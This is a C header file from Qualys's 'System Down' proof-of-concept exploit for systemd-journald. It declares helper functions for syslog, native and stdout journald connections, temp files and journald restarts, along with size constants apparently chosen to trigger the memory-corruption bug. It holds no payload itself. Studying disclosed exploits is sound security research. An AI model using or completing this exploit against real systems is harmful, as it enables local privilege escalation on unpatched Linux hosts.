/*
 * System Down: A systemd-journald exploit
 * https://www.qualys.com/2019/01/09/system-down/system-down.txt
 * Copyright (C) 2019 Qualys, Inc.
 *
 * This program is free software: you can redistribute it and/or modify
 * it under the terms of the GNU General Public License as published by
 * the Free Software Foundation, either version 3 of the License, or
 * (at your option) any later version.
 *
 * This program is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 * GNU General Public License for more details.
 *
 * You should have received a copy of the GNU General Public License
 * along with this program.  If not, see <https://www.gnu.org/licenses/>.
 */

#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>

#include "macro.h"
#include "time-util.h"

typedef struct {
    uintmax_t MainPID;
    uintmax_t LimitSTACKSoft;
    uintmax_t StartLimitBurst;
    uintmax_t StartLimitInterval;
    uintmax_t WatchdogUSec;
} journald_t;

journald_t show_journald(void);
size_t journald_LimitSTACKSoft(void);
usec_t journald_WatchdogUSec(void);

#define TIMED_WHILE(expression) \
    for (const usec_t _start_ = now(), \
         _timeout_ = usec_add(journald_WatchdogUSec(), journald_WatchdogUSec()); (expression); ) \
        if (usec_sub(now(), _start_) > usec_add(_timeout_, 1 * USEC_PER_MINUTE)) die(); \
        else

unsigned make_syslog_priority(void);
void generate_syslog_identifier(char * buf, size_t size);
size_t read_from_journal(const char * identifier, char * buf, size_t size);
int open_syslog_connection(void);
void ping_syslog_server(void);

typedef struct {
    int fd;
    bool is_memfd;
} tempfile_t;

int open_native_connection(void);
tempfile_t open_native_tempfile(bool try_memfd, size_t estimated_size);
size_t native_tempfile_size(tempfile_t tempfile);
void send_native_tempfile(int native_fd, tempfile_t tempfile);

typedef struct {
    unsigned long dev;
    unsigned long ino;
} peer_t;

typedef struct {
    int fd;
    peer_t peer;
} stream_t;

stream_t open_stdout_stream(void);
void close_stdout_stream(stream_t stream);
void restart_journald(void);

#define ENTRY_SIZE_MAX (1024*1024*770u)
#define DATA_SIZE_MAX (1024*1024*768u)

#define NATIVE_ITEM "A=\n"
#define NATIVE_ITEM_LEN (sizeof(NATIVE_ITEM)-1)

struct EntryItem {
    uint64_t object_offset;
    uint64_t hash;
} _packed_;
typedef struct EntryItem EntryItem;

#define DEFAULT_MAX_SIZE_UPPER (128ULL*1024ULL*1024ULL)        /* 128 MiB */

